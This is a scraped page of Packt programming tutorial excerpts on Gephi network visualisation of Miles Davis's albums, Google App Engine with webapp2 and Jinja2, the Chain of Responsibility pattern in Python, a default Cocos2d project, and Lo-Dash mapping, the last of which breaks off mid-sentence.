of these principles. The project I'll use as our example traces the studio albums recorded by the legendary jazz trumpeter, Miles Davis—48 in all. Here are the details for this project, following the above progression. Analysis goal The goal of the analysis was to inform viewers, who might or might not be jazz fans, about the remarkable, far reaching recording legacy of Miles Davis. Since the career of Davis moved through many stages, he crossed paths with and employed an incredible number of artists across a diverse range of instruments that ranged far beyond the normal jazz instrumentation. Therefore, part of the goal of the analysis was to expose viewers to this great diversity, and give them the ability to see changes and patterns within the scope of his career. Dataset parameters The dataset in this case is not insignificant—while 48 albums would represent a small network if left on its own, we know from the data that there are typically at least four musicians per recording, and often far more, numbering into the 20s in some cases. Many of the musicians are represented on multiple recordings, but there is still a multiplicative impact on the size of the network, which turns out to have about 350 nodes. While this certainly doesn't rival the enormous datasets often seen in social networks, it is large enough that we need to be thoughtful about the layout and how users will interact with the project. Here is a look at some of the underlying data for the nodes: Miles Davis nodes Notice that the nodes are a combination of an individual musician and a specific instrument, since so many of these musicians play a second (or even third) instrument. The data is then grouped by instrument, which allows you to partition and custom color the data. Now, the following figure illustrates a partial view of the edge's data: Miles Davis data edges In the preceding screenshot, we see only album level connections, with Miles Davis as the source and each album as the target, although the edges are left undirected. If we move further into the edge's data, we can see how the network is structured a bit more clearly: Miles Davis data edge details This data shows some of the musician level connections to specific recordings, as well as the instrument played on that album. This completes the basic structure of the network, as each musician will have an edge connecting them to any and all albums they played on. So this gives us a basic understanding of how the data will be represented in the network—Miles at the core, all albums at a second level, followed by every contributing musician at a tertiary level. Network density We have all seen many highly connected networks with edges crossing between nodes or groups within a graph that become virtually impenetrable for the viewer. Fortunately, this was not a major concern with this network, given its relatively modest size, but it could still play a role in the final layout selection. As always, the goal is to provide clarity and understanding, regardless of the relative size of the network, so minimizing visual clutter is always a priority. Network behaviors Examining the network behaviors can be an interesting exercise, as it often leads us to findings that were not necessarily anticipated. In the case of this project, we know from viewing the data that Miles played with certain musicians on a frequent basis, but would then often play with an entirely new group during his next phase, before switching yet again to a completely unrelated group of musicians. In other words, there were multiple aggregations of musicians who only occasionally intersected with one another. This is very nearly a proxy for homophily, with distinct clusters connected to each other through a single node (Miles Davis in this case) or perhaps a small subset of network members who act as bridges between various clusters. Based on this knowledge, we would anticipate a highly clustered network with a significant level of connectedness within a given cluster, and a limited set of connections between clusters. The next decision to make was how best to display this network. Network display We just saw the underlying data structure, which had a bipartite nature to it, with each musician connecting to one or more albums, rather than to other musicians. Given this type of network, we want to select a layout that eases our ability to see not only the connections between Miles Davis and each recording, but also from each album to all of the participating musicians. This will require a layout that provides enough empty space to make for clear viewing, but also one that manages to combine this with a minimal number of edge crossings. Remember that many of these musicians played on multiple recordings, so they must be positioned in proximity to several albums at the same time, without adding to a cluttered look. After testing several layouts, some of which simply didn't work effectively with the above two needs, I settled on the ARF algorithm for its visual clarity to display this particular network. The ability to see patterns within the network, even prior to adding interactivity, is a plus; if the network passes that test, it should be very effective once users interact with the information. Temporal elements Another interesting aspect of the network that could have been utilized was the timeline for the recordings. With more than four decades of recordings, this could have provided a wealth of information about changes over time in the musicians' network and instrumentation on each album. This element was not highlighted, but it does make its presence felt in the final network, with albums from one period with a consistent cast of musicians occupying one sector of the graph, while other types of albums with many infrequently used musicians land in another area. Interactivity The final decision was whether to make the network interactive, giving users the ability to learn more through self-navigation of the graph. This was considered important from the very start, so that the viewers could see not only the body of work represented by the 48 recordings, but also the evolution of which musicians were involved, as well as shining a light on the wide array of instruments used as Miles' career evolved. After each of these considerations was evaluated, and through a period of testing the network using multiple layouts, I settled on the ARF force-directed layout coupled with the Sigma.js plugin for interactivity. Here's a look at the final output, which includes options using the Sigma.js plugin: The Miles Davis network graph The link to the project can be found at http://visual-baseball.com/gephi/jazz/miles_davis/. I hope this example helps to generate some ideas or at least opens up the possibilities for what Gephi is capable of creating, and that the process illustrated earlier helps to provide at least a foundation for your own work. Summary In this article, you learned how to select the most appropriate types based on the characteristics of your network data. Resources for Article: Further resources on this subject: Data visualization [article] Visualization as a Tool to Understand Data [article] Creating Network Graphs with Gephi [article]

0
0
12003

Packt

05 Feb 2015

11 min read

Google App Engine

Packt

05 Feb 2015

11 min read

In this article by Massimiliano Pippi, author of the book Python for Google App Engine, in this article, you will learn how to write a web application and seeing the platform in action. Web applications commonly provide a set of features such as user authentication and data storage. App Engine provides the services and tools needed to implement such features. (For more resources related to this topic, see here.) In this article, we will see: Details of the webapp2 framework How to authenticate users Storing data on Google Cloud Datastore Building HTML pages using templates Experimenting on the Notes application To better explore App Engine and Cloud Platform capabilities, we need a real-world application to experiment on; something that's not trivial to write, with a reasonable list of requirements. A good candidate is a note-taking application; we will name it Notes. Notes enable the users to add, remove, and modify a list of notes; a note has a title and a body of text. Users can only see their personal notes, so they must authenticate before using the application. The main page of the application will show the list of notes for logged-in users and a form to add new ones. The code from the helloworld example is a good starting point. We can simply change the name of the root folder and the application field in the app.yaml file to match the new name we chose for the application, or we can start a new project from scratch named notes. Authenticating users The first requirement for our Notes application is showing the home page only to users who are logged in and redirect others to the login form; the users service provided by App Engine is exactly what we need and adding it to our MainHandler class is quite simple: import webapp2 from google.appengine.api import users class MainHandler(webapp2.RequestHandler): def get(self): user = users.get_current_user() if user is not None: self.response.write('Hello Notes!') else: login_url = users.create_login_url(self.request.uri) self.redirect(login_url) app = webapp2.WSGIApplication([ ('/', MainHandler) ], debug=True) The user package we import on the second line of the previous code provides access to users' service functionalities. Inside the get() method of the MainHandler class, we first check whether the user visiting the page has logged in or not. If they have, the get_current_user() method returns an instance of the user class provided by App Engine and representing an authenticated user; otherwise, it returns None as output. If the user is valid, we provide the response as we did before; otherwise, we redirect them to the Google login form. The URL of the login form is returned using the create_login_url() method, and we call it, passing as a parameter the URL we want to redirect users to after a successful authentication. In this case, we want to redirect users to the same URL they are visiting, provided by webapp2 in the self.request.uri property. The webapp2 framework also provides handlers with a redirect() method we can use to conveniently set the right status and location properties of the response object so that the client browsers will be redirected to the login page. HTML templates with Jinja2 Web applications provide rich and complex HTML user interfaces, and Notes is no exception but, so far, response objects in our applications contained just small pieces of text. We could include HTML tags as strings in our Python modules and write them in the response body but we can imagine how easily it could become messy and hard to maintain the code. We need to completely separate the Python code from HTML pages and that's exactly what a template engine does. A template is a piece of HTML code living in its own file and possibly containing additional, special tags; with the help of a template engine, from the Python script, we can load this file, properly parse special tags, if any, and return valid HTML code in the response body. App Engine includes in the Python runtime a well-known template engine: the Jinja2 library. To make the Jinja2 library available to our application, we need to add this code to the app.yaml file under the libraries section: libraries: - name: webapp2 version: "2.5.2" - name: jinja2 version: latest We can put the HTML code for the main page in a file called main.html inside the application root. We start with a very simple page: <!DOCTYPE html> <html> <head lang="en"> <meta charset="UTF-8"> <title>Notes</title> </head> <body> <div class="container"> <h1>Welcome to Notes!</h1> <p> Hello, <b>{{user}}</b> - <a href="{{logout_url}}">Logout</a> </p> </div> </body> </html> Most of the content is static, which means that it will be rendered as standard HTML as we see it but there is a part that is dynamic and whose content depend on which data will be passed at runtime to the rendering process. This data is commonly referred to as template context. What has to be dynamic is the username of the current user and the link used to log out from the application. The HTML code contains two special elements written in the Jinja2 template syntax, {{user}} and {{logout_url}}, that will be substituted before the final output occurs. Back to the Python script; we need to add the code to initialize the template engine before the MainHandler class definition: import os import jinja2 jinja_env = jinja2.Environment( loader=jinja2.FileSystemLoader(os.path.dirname(__file__))) The environment instance stores engine configuration and global objects, and it's used to load templates instances; in our case, instances are loaded from HTML files on the filesystem in the same directory as the Python script. To load and render our template, we add the following code to the MainHandler.get() method: class MainHandler(webapp2.RequestHandler): def get(self): user = users.get_current_user() if user is not None: logout_url = users.create_logout_url(self.request.uri) template_context = { 'user': user.nickname(), 'logout_url': logout_url, } template = jinja_env.get_template('main.html') self.response.out.write( template.render(template_context)) else: login_url = users.create_login_url(self.request.uri) self.redirect(login_url) Similar to how we get the login URL, the create_logout_url() method provided by the user service returns the absolute URI to the logout procedure that we assign to the logout_url variable. We then create the template_context dictionary that contains the context values we want to pass to the template engine for the rendering process. We assign the nickname of the current user to the user key in the dictionary and the logout URL string to the logout_url key. The get_template() method from the jinja_env instance takes the name of the file that contains the HTML code and returns a Jinja2 template object. To obtain the final output, we call the render() method on the template object passing in the template_context dictionary whose values will be accessed, specifying their respective keys in the HTML file with the template syntax elements {{user}} and {{logout_url}}. Handling forms The main page of the application is supposed to list all the notes that belong to the current user but there isn't any way to create such notes at the moment. We need to display a web form on the main page so that users can submit details and create a note. To display a form to collect data and create notes, we put the following HTML code right below the username and the logout link in the main.html template file: {% if note_title %} <p>Title: {{note_title}}</p> <p>Content: {{note_content}}</p> {% endif %} <h4>Add a new note</h4> <form action="" method="post"> <div class="form-group"> <label for="title">Title:</label> <input type="text" id="title" name="title" /> </div> <div class="form-group"> <label for="content">Content:</label> <textarea id="content" name="content"></textarea> </div> <div class="form-group"> <button type="submit">Save note</button> </div> </form> Before showing the form, a message is displayed only when the template context contains a variable named note_title. To do this, we use an if statement, executed between the {% if note_title %} and {% endif %} delimiters; similar delimiters are used to perform for loops or assign values inside a template. The action property of the form tag is empty; this means that upon form submission, the browser will perform a POST request to the same URL, which in this case is the home page URL. As our WSGI application maps the home page to the MainHandler class, we need to add a method to this class so that it can handle POST requests: class MainHandler(webapp2.RequestHandler): def get(self): user = users.get_current_user() if user is not None: logout_url = users.create_logout_url(self.request.uri) template_context = { 'user': user.nickname(), 'logout_url': logout_url, } template = jinja_env.get_template('main.html') self.response.out.write( template.render(template_context)) else: login_url = users.create_login_url(self.request.uri) self.redirect(login_url) def post(self): user = users.get_current_user() if user is None: self.error(401) logout_url = users.create_logout_url(self.request.uri) template_context = { 'user': user.nickname(), 'logout_url': logout_url, 'note_title': self.request.get('title'), 'note_content': self.request.get('content'), } template = jinja_env.get_template('main.html') self.response.out.write( template.render(template_context)) When the form is submitted, the handler is invoked and the post() method is called. We first check whether a valid user is logged in; if not, we raise an HTTP 401: Unauthorized error without serving any content in the response body. Since the HTML template is the same served by the get() method, we still need to add the logout URL and the user name to the context. In this case, we also store the data coming from the HTML form in the context. To access the form data, we call the get() method on the self.request object. The last three lines are boilerplate code to load and render the home page template. We can move this code in a separate method to avoid duplication: def _render_template(self, template_name, context=None): if context is None: context = {} template = jinja_env.get_template(template_name) return template.render(context) In the handler class, we will then use something like this to output the template rendering result: self.response.out.write( self._render_template('main.html', template_context)) We can try to submit the form and check whether the note title and content are actually displayed above the form. Summary Thanks to App Engine, we have already implemented a rich set of features with a relatively small effort so far. We have discovered some more details about the webapp2 framework and its capabilities, implementing a nontrivial request handler. We have learned how to use the App Engine users service to provide users authentication. We have delved into some fundamental details of Datastore and now we know how to structure data in grouped entities and how to effectively retrieve data with ancestor queries. In addition, we have created an HTML user interface with the help of the Jinja2 template library, learning how to serve static content such as CSS files. Resources for Article: Further resources on this subject: Machine Learning in IPython with scikit-learn [Article] Introspecting Maya, Python, and PyMEL [Article] Driving Visual Analyses with Automobile Data (Python) [Article]

0
0
3192

How-To Tutorials

article-image-advanced-programming-and-control

Packt

05 Feb 2015

10 min read

Advanced Programming and Control

Packt

05 Feb 2015

10 min read

0
0
8493

How-To Tutorials

article-image-chain-responsibility-pattern

Packt

05 Feb 2015

12 min read

The Chain of Responsibility Pattern

Packt

05 Feb 2015

12 min read

In this article by Sakis Kasampalis, author of the book Mastering Python Design Patterns, we will see a detailed description of the Chain of Responsibility design pattern with the help of a real-life example as well as a software example. Also, its use cases and implementation are discussed. (For more resources related to this topic, see here.) When developing an application, most of the time we know which method should satisfy a particular request in advance. However, this is not always the case. For example, we can think of any broadcast computer network, such as the original Ethernet implementation [j.mp/wikishared]. In broadcast computer networks, all requests are sent to all nodes (broadcast domains are excluded for simplicity), but only the nodes that are interested in a sent request process it. All computers that participate in a broadcast network are connected to each other using a common medium such as the cable that connects the three nodes in the following figure: If a node is not interested or does not know how to handle a request, it can perform the following actions: Ignore the request and do nothing Forward the request to the next node The way in which the node reacts to a request is an implementation detail. However, we can use the analogy of a broadcast computer network to understand what the chain of responsibility pattern is all about. The Chain of Responsibility pattern is used when we want to give a chance to multiple objects to satisfy a single request, or when we don't know which object (from a chain of objects) should process a specific request in advance. The principle is the same as the following: There is a chain (linked list, tree, or any other convenient data structure) of objects. We start by sending a request to the first object in the chain. The object decides whether it should satisfy the request or not. The object forwards the request to the next object. This procedure is repeated until we reach the end of the chain. At the application level, instead of talking about cables and network nodes, we can focus on objects and the flow of a request. The following figure, courtesy of a title="Scala for Machine Learning" www.sourcemaking.com [j.mp/smchain], shows how the client code sends a request to all processing elements (also known as nodes or handlers) of an application: Note that the client code only knows about the first processing element, instead of having references to all of them, and each processing element only knows about its immediate next neighbor (called the successor), not about every other processing element. This is usually a one-way relationship, which in programming terms means a singly linked list in contrast to a doubly linked list; a singly linked list does not allow navigation in both ways, while a doubly linked list allows that. This chain organization is used for a good reason. It achieves decoupling between the sender (client) and the receivers (processing elements) [GOF95, page 254]. A real-life example ATMs and, in general, any kind of machine that accepts/returns banknotes or coins (for example, a snack vending machine) use the chain of responsibility pattern. There is always a single slot for all banknotes, as shown in the following figure, courtesy of www.sourcemaking.com: When a banknote is dropped, it is routed to the appropriate receptacle. When it is returned, it is taken from the appropriate receptacle [j.mp/smchain], [j.mp/c2chain]. We can think of the single slot as the shared communication medium and the different receptacles as the processing elements. The result contains cash from one or more receptacles. For example, in the preceding figure, we see what happens when we request $175 from the ATM. A software example I tried to find some good examples of Python applications that use the Chain of Responsibility pattern but I couldn't, most likely because Python programmers don't use this name. So, my apologies, but I will use other programming languages as a reference. The servlet filters of Java are pieces of code that are executed before an HTTP request arrives at a target. When using servlet filters, there is a chain of filters. Each filter performs a different action (user authentication, logging, data compression, and so forth), and either forwards the request to the next filter until the chain is exhausted, or it breaks the flow if there is an error (for example, the authentication failed three consecutive times) [j.mp/soservl]. Apple's Cocoa and Cocoa Touch frameworks use Chain of Responsibility to handle events. When a view receives an event that it doesn't know how to handle, it forwards the event to its superview. This goes on until a view is capable of handling the event or the chain of views is exhausted [j.mp/chaincocoa]. Use cases By using the Chain of Responsibility pattern, we give a chance to a number of different objects to satisfy a specific request. This is useful when we don't know which object should satisfy a request in advance. An example is a purchase system. In purchase systems, there are many approval authorities. One approval authority might be able to approve orders up to a certain value, let's say $100. If the order is more than $100, the order is sent to the next approval authority in the chain that can approve orders up to $200, and so forth. Another case where Chain of Responsibility is useful is when we know that more than one object might need to process a single request. This is what happens in an event-based programming. A single event such as a left mouse click can be caught by more than one listener. It is important to note that the Chain of Responsibility pattern is not very useful if all the requests can be taken care of by a single processing element, unless we really don't know which element that is. The value of this pattern is the decoupling that it offers. Instead of having a many-to-many relationship between a client and all processing elements (and the same is true regarding the relationship between a processing element and all other processing elements), a client only needs to know how to communicate with the start (head) of the chain. The following figure demonstrates the difference between tight and loose coupling. The idea behind loosely coupled systems is to simplify maintenance and make it easier for us to understand how they function [j.mp/loosecoup]: Implementation There are many ways to implement Chain of Responsibility in Python, but my favorite implementation is the one by Vespe Savikko [j.mp/savviko]. Vespe's implementation uses dynamic dispatching in a Pythonic style to handle requests [j.mp/ddispatch]. Let's implement a simple event-based system using Vespe's implementation as a guide. The following is the UML class diagram of the system: The Event class describes an event. We'll keep it simple, so in our case an event has only name: class Event: def __init__(self, name): self.name = name def __str__(self): return self.name The Widget class is the core class of the application. The parent aggregation shown in the UML diagram indicates that each widget can have a reference to a parent object, which by convention, we assume is a Widget instance. Note, however, that according to the rules of inheritance, an instance of any of the subclasses of Widget (for example, an instance of MsgText) is also an instance of Widget. The default value of parent is None: class Widget: def __init__(self, parent=None): self.parent = parent The handle() method uses dynamic dispatching through hasattr() and getattr() to decide who is the handler of a specific request (event). If the widget that is asked to handle an event does not support it, there are two fallback mechanisms. If the widget has parent, then the handle() method of parent is executed. If the widget has no parent but a handle_default() method, handle_default() is executed: def handle(self, event): handler = 'handle_{}'.format(event) if hasattr(self, handler): method = getattr(self, handler) method(event) elif self.parent: self.parent.handle(event) elif hasattr(self, 'handle_default'): self.handle_default(event) At this point, you might have realized why the Widget and Event classes are only associated (no aggregation or composition relationships) in the UML class diagram. The association is used to show that the Widget class "knows" about the Event class but does not have any strict references to it, since an event needs to be passed only as a parameter to handle(). MainWIndow, MsgText, and SendDialog are all widgets with different behaviors. Not all these three widgets are expected to be able to handle the same events, and even if they can handle the same event, they might behave differently. MainWIndow can handle only the close and default events: class MainWindow(Widget): def handle_close(self, event): print('MainWindow: {}'.format(event)) def handle_default(self, event): print('MainWindow Default: {}'.format(event)) SendDialog can handle only the paint event: class SendDialog(Widget): def handle_paint(self, event): print('SendDialog: {}'.format(event)) Finally, MsgText can handle only the down event: class MsgText(Widget): def handle_down(self, event): print('MsgText: {}'.format(event)) The main() function shows how we can create a few widgets and events, and how the widgets react to those events. All events are sent to all the widgets. Note the parent relationship of each widget. The sd object (an instance of SendDialog) has as its parent the mw object (an instance of MainWindow). However, not all objects need to have a parent that is an instance of MainWindow. For example, the msg object (an instance of MsgText) has the sd object as a parent: def main(): mw = MainWindow() sd = SendDialog(mw) msg = MsgText(sd) for e in ('down', 'paint', 'unhandled', 'close'): evt = Event(e) print('nSending event -{}- to MainWindow'.format(evt)) mw.handle(evt) print('Sending event -{}- to SendDialog'.format(evt)) sd.handle(evt) print('Sending event -{}- to MsgText'.format(evt)) msg.handle(evt) The following is the full code of the example (chain.py): class Event: def __init__(self, name): self.name = name def __str__(self): return self.name class Widget: def __init__(self, parent=None): self.parent = parent def handle(self, event): handler = 'handle_{}'.format(event) if hasattr(self, handler): method = getattr(self, handler) method(event) elif self.parent: self.parent.handle(event) elif hasattr(self, 'handle_default'): self.handle_default(event) class MainWindow(Widget): def handle_close(self, event): print('MainWindow: {}'.format(event)) def handle_default(self, event): print('MainWindow Default: {}'.format(event)) class SendDialog(Widget): def handle_paint(self, event): print('SendDialog: {}'.format(event)) class MsgText(Widget): def handle_down(self, event): print('MsgText: {}'.format(event)) def main(): mw = MainWindow() sd = SendDialog(mw) msg = MsgText(sd) for e in ('down', 'paint', 'unhandled', 'close'): evt = Event(e) print('nSending event -{}- to MainWindow'.format(evt)) mw.handle(evt) print('Sending event -{}- to SendDialog'.format(evt)) sd.handle(evt) print('Sending event -{}- to MsgText'.format(evt)) msg.handle(evt) if __name__ == '__main__': main() Executing chain.py gives us the following results: >>> python3 chain.py Sending event -down- to MainWindow MainWindow Default: down Sending event -down- to SendDialog MainWindow Default: down Sending event -down- to MsgText MsgText: down Sending event -paint- to MainWindow MainWindow Default: paint Sending event -paint- to SendDialog SendDialog: paint Sending event -paint- to MsgText SendDialog: paint Sending event -unhandled- to MainWindow MainWindow Default: unhandled Sending event -unhandled- to SendDialog MainWindow Default: unhandled Sending event -unhandled- to MsgText MainWindow Default: unhandled Sending event -close- to MainWindow MainWindow: close Sending event -close- to SendDialog MainWindow: close Sending event -close- to MsgText MainWindow: close There are some interesting things that we can see in the output. For instance, sending a down event to MainWindow ends up being handled by the default MainWindow handler. Another nice case is that although a close event cannot be handled directly by SendDialog and MsgText, all the close events end up being handled properly by MainWindow. That's the beauty of using the parent relationship as a fallback mechanism. If you want to spend some more creative time on the event example, you can replace the dumb print statements and add some actual behavior to the listed events. Of course, you are not limited to the listed events. Just add your favorite event and make it do something useful! Another exercise is to add a MsgText instance during runtime that has MainWindow as the parent. Is this hard? Do the same for an event (add a new event to an existing widget). Which is harder? Summary In this article, we covered the Chain of Responsibility design pattern. This pattern is useful to model requests / handle events when the number and type of handlers isn't known in advance. Examples of systems that fit well with Chain of Responsibility are event-based systems, purchase systems, and shipping systems. In the Chain Of Responsibility pattern, the sender has direct access to the first node of a chain. If the request cannot be satisfied by the first node, it forwards to the next node. This continues until either the request is satisfied by a node or the whole chain is traversed. This design is used to achieve loose coupling between the sender and the receiver(s). ATMs are an example of Chain Of Responsibility. The single slot that is used for all banknotes can be considered the head of the chain. From here, depending on the transaction, one or more receptacles is used to process the transaction. The receptacles can be considered the processing elements of the chain. Java's servlet filters use the Chain of Responsibility pattern to perform different actions (for example, compression and authentication) on an HTTP request. Apple's Cocoa frameworks use the same pattern to handle events such as button presses and finger gestures. Resources for Article: Further resources on this subject: Exploring Model View Controller [Article] Analyzing a Complex Dataset [Article] Automating Your System Administration and Deployment Tasks Over SSH [Article]

0
0
10075

Packt

05 Feb 2015

9 min read

Run Xcode Run

Packt

05 Feb 2015

9 min read

In this article by Jorge Jordán, author of the book Cocos2d Game Development Blueprints, we will see how to run the newly created project in Xcode. (For more resources related to this topic, see here.) Click on Run at the top-left of the Xcode window and it will run the project in the iOS Simulator, which defaults to an iOS 6.1 iPhone: Voilà! You've just built your first Hello World example with Cocos2d v3, but before going further, let's take a look at the code to understand how it works. We will be using iOS Simulator to run the game unless otherwise specified. Understanding the default project We are going to take an overview of the classes available in a new project, but don't worry if you don't understand everything; the objective of this section is just to get familiar with the look of a Cocos2d game. If you open the main.m class under the Supporting Files group, you will see: int main(int argc, char *argv[]) { @autoreleasepool { int retVal = UIApplicationMain(argc, argv, nil, @"AppDelegate"); return retVal; } } As you can see, the @autorelease block means that ARC is enabled by default on new Cocos2d projects so we don't have to worry about releasing objects or enabling ARC. ARC is the acronym for Automatic Reference Counting and it's a compiler iOS feature to provide automatic memory management of objects. It works by adding code at compile time, ensuring every object lives as long as necessary, but not longer. On the other hand, the block calls AppDelegate, a class that inherits from CCAppDelegate which implements the UIApplicationDelegate protocol. In other words, the starting point of our game and the place to set up our app is located in AppDelegate, like a typical iOS application. If you open AppDelegate.m, you will see the following method, which is called when the game has been launched: -(BOOL)application:(UIApplication *)applicationdidFinishLaunchingWithOptions:(NSDictionary *)launchOptions { [self setupCocos2dWithOptions:@{ CCSetupShowDebugStats: @(YES), }]; return YES; } Here, the only initial configuration specified is to enable the debug stats, specifying the option CCSetupShowDebugStats: @(YES), that you can see in the previous block of code. The number on the top indicates the amount of draw calls and the two labels below are the time needed to update the frame and the frame rate respectively. The maximum frame rate an iOS device can have is 60 and it's a measure of the smoothness a game can attain: the higher the frame rate, the smoother the game. You will need to have the top and the bottom values in mind as the number of draw calls and the frame rate will let you know how efficient your game will be. The next thing to take care of is the startScene method: -(CCScene *)startScene { // The initial scene will be GameScene return [IntroScene scene]; } This method should be overriden to indicate the first scene we want to display in our game. In this case, it points to IntroScene where the init method looks like the following code: - (id)init { // Apple recommends assigning self with super's return value self = [super init]; if (!self) { return(nil); } // Create a colored background (Dark Gray) CCNodeColor *background = [CCNodeColor nodeWithColor:[CCColorcolorWithRed:0.2f green:0.2f blue:0.2f alpha:1.0f]]; [self addChild:background]; // Hello world CCLabelTTF *label = [CCLabelTTF labelWithString:@"Hello World"fontName:@"Chalkduster" fontSize:36.0f]; label.positionType = CCPositionTypeNormalized; label.color = [CCColor redColor]; label.position = ccp(0.5f, 0.5f); // Middle of screen [self addChild:label]; // Helloworld scene button CCButton *helloWorldButton = [CCButton buttonWithTitle:@"[Start ]" fontName:@"Verdana-Bold" fontSize:18.0f]; helloWorldButton.positionType = CCPositionTypeNormalized; helloWorldButton.position = ccp(0.5f, 0.35f); [helloWorldButton setTarget:self selector:@selector(onSpinningClicked:)]; [self addChild:helloWorldButton]; // done return self; } This code first calls the initialization method for the superclass IntroScene by sending the [super init] message. Then it creates a gray-colored background with a CCNodeColor class, which is basically a solid color node, but this background won't be shown until it's added to the scene, which is exactly what [self addChild:background] does. The red "Hello World" label you can see in the previous screenshot is an instance of the CCLabelTTF class, whose position will be centered on the screen thanks to label.position = ccp(0.5f, 0.5f). Cocos2d provides the cpp(coord_x, coord_y) method, which is a precompiler macro for CGPointMake and both can be used interchangeably. The last code block creates CCButton that will call onSpinningClicked once we click on it. This source code isn't hard at all, but what will happen when we click on the Start button? Don't be shy, go back to the iOS Simulator and find out! If you take a look at the onSpinningClicked method in IntroScene.m, you will understand what happened: - (void)onSpinningClicked:(id)sender { // start spinning scene with transition [[CCDirector sharedDirector] replaceScene:[HelloWorldScene scene] withTransition:[CCTransitiontransitionPushWithDirection:CCTransitionDirectionLeftduration:1.0f]]; } This code presents the HelloWorldScene scene replacing the current one (InitScene) and it's being done by pushing HelloWorldScene to the top of the scene stack and using a horizontal scroll transition that will last for 1.0 second. Let's take a look at the HelloWorldScene.m to understand the behavior we just experienced: @implementation HelloWorldScene { CCSprite *_sprite; } - (id)init { // Apple recommends assigning self with super's return value self = [super init]; if (!self) { return(nil); } // Enable touch handling on scene node self.userInteractionEnabled = YES; // Create a colored background (Dark Gray) CCNodeColor *background = [CCNodeColor nodeWithColor:[CCColorcolorWithRed:0.2f green:0.2f blue:0.2f alpha:1.0f]]; [self addChild:background]; // Add a sprite _sprite = [CCSprite spriteWithImageNamed:@"Icon-72.png"]; _sprite.position = ccp(self.contentSize.width/2,self.contentSize.height/2); [self addChild:_sprite]; // Animate sprite with action CCActionRotateBy* actionSpin = [CCActionRotateByactionWithDuration:1.5f angle:360]; [_sprite runAction:[CCActionRepeatForeveractionWithAction:actionSpin]]; // Create a back button CCButton *backButton = [CCButton buttonWithTitle:@"[ Menu ]"fontName:@"Verdana-Bold" fontSize:18.0f]; backButton.positionType = CCPositionTypeNormalized; backButton.position = ccp(0.85f, 0.95f); // Top Right ofscreen [backButton setTarget:self selector:@selector(onBackClicked:)]; [self addChild:backButton]; // done return self; } This piece of code is very similar to the one we saw in IntroScene.m, which is why we just need to focus on the differences. If you look at the top of the class, you can see how we are declaring a private instance for a CCSprite class, which is also a subclass of CCNode, and its main role is to render 2D images on the screen. The CCSprite class is one of the most-used classes in Cocos2d game development, as it provides a visual representation and a physical shape to the objects in view. Then, in the init method, you will see the instruction self.userInteractionEnabled = YES, which is used to enable the current scene to detect and manage touches by implementing the touchBegan method. The next thing to highlight is how we initialize a CCSprite class using an image, positioning it in the center of the screen. If you read a couple more lines, you will understand why the icon rotates as soon as the scene is loaded. We create a 360-degree rotation action thanks to CCRotateBy that will last for 1.5 seconds. But why is this rotation repeated over and over? This happens thanks to CCActionRepeatForever, which will execute the rotate action as long as the scene is running. The last piece of code in the init method doesn't need explanation as it creates a CCButton that will execute onBackClicked once clicked. This method replaces the scene HelloWorldScene with IntroScene in a similar way as we saw before, with only one difference: the transition happens from left to right. Did you try to touch the screen? Try it and you will understand why touchBegan has the following code: -(void) touchBegan:(UITouch *)touch withEvent:(UIEvent *)event { CGPoint touchLoc = [touch locationInNode:self]; // Move our sprite to touch location CCActionMoveTo *actionMove = [CCActionMoveToactionWithDuration:1.0f position:touchLoc]; [_sprite runAction:actionMove]; } This is one of the methods you need to implement to manage touch. The others are touchMoved, touchEnded, and touchCancelled. When the user begins touching the screen, the sprite will move to the registered coordinates thanks to a commonly used action: CCActionMoveto. This action just needs to know the position that we want to move our sprite to and the duration of the movement. Now that we have had an overview of the initial project code, it is time to go deeper into some of the classes we have shown. Did you realize that CCNode is the parent class of several classes we have seen? You will understand why if you keep reading. Summary In this article, we had our first contact with a Cocos2d project. We executed a new project and took an overview of it, understanding some of the classes that are part of this framework. Resources for Article: Further resources on this subject: Dragging a CCNode in Cocos2D-Swift [Article] Animations in Cocos2d-x [Article] Why should I make cross-platform games? [Article]

0
0
7593

article-image-transformations-using-mapreduce

Packt

05 Feb 2015

19 min read

Transformations Using Map/Reduce

Packt

05 Feb 2015

19 min read

In this article written by Adam Boduch, author of the book Lo-Dash Essentials, we'll be looking at all the interesting things we can do with Lo-Dash and the map/reduce programming model. We'll start off with the basics, getting our feet wet with some basic mappings and basic reductions. As we progress through the article, we'll start introducing more advanced techniques to think in terms of map/reduce with Lo-Dash. The goal, once you've reached the end of this article, is to have a solid understanding of the Lo-Dash functions available that aid in mapping and reducing collections. Additionally, you'll start to notice how disparate Lo-Dash functions work together in the map/reduce domain. Ready? (For more resources related to this topic, see here.) Plucking values Consider that as your informal introduction to mapping because that's essentially what it's doing. It's taking an input collection and mapping it to a new collection, plucking only the properties we're interested in. This is shown in the following example: var collection = [ { name: 'Virginia', age: 45 }, { name: 'Debra', age: 34 }, { name: 'Jerry', age: 55 }, { name: 'Earl', age: 29 } ]; _.pluck(collection, 'age'); // → [ 45, 34, 55, 29 ] This is about as simple a mapping operation as you'll find. In fact, you can do the same thing with map(): var collection = [ { name: 'Michele', age: 58 }, { name: 'Lynda', age: 23 }, { name: 'William', age: 35 }, { name: 'Thomas', age: 41 } ]; _.map(collection, 'name'); // → // [ // "Michele", // "Lynda", // "William", // "Thomas" // ] As you'd expect, the output here is exactly the same as it would be with pluck(). In fact, pluck() is actually using the map() function under the hood. The callback passed to map() is constructed using property(), which just returns the specified property value. The map() function falls back to this plucking behavior when a string instead of a function is passed to it. With that brief introduction to the nature of mapping, let's dig a little deeper and see what's possible in mapping collections. Mapping collections In this section, we'll explore mapping collections. Mapping one collection to another ranges from composing really simple—as we saw in the preceding section—to sophisticated callbacks. These callbacks that map each item in the collection can include or exclude properties and can calculate new values. Besides, we can apply functions to these items. We'll also address the issue of filtering collections and how this can be done in conjunction with mapping. Including and excluding properties When applied to an object, the pick() function generates a new object containing only the specified properties. The opposite of this function, omit(), generates an object with every property except those specified. Since these functions work fine for individual object instances, why not use them in a collection? You can use both of these functions to shed properties from collections by mapping them to new ones, as shown in the following code: var collection = [ { first: 'Ryan', last: 'Coleman', age: 23 }, { first: 'Ann', last: 'Sutton', age: 31 }, { first: 'Van', last: 'Holloway', age: 44 }, { first: 'Francis', last: 'Higgins', age: 38 } ]; _.map(collection, function(item) { return _.pick(item, [ 'first', 'last' ]); }); // → // [ // { first: "Ryan", last: "Coleman" }, // { first: "Ann", last: "Sutton" }, // { first: "Van", last: "Holloway" }, // { first: "Francis", last: "Higgins" } // ] Here, we're creating a new collection using the map() function. The callback function supplied to map() is applied to each item in the collection. The item argument is the original item from the collection. The callback is expected to return the mapped version of that item and this version could be anything, including the original item itself. Be careful when 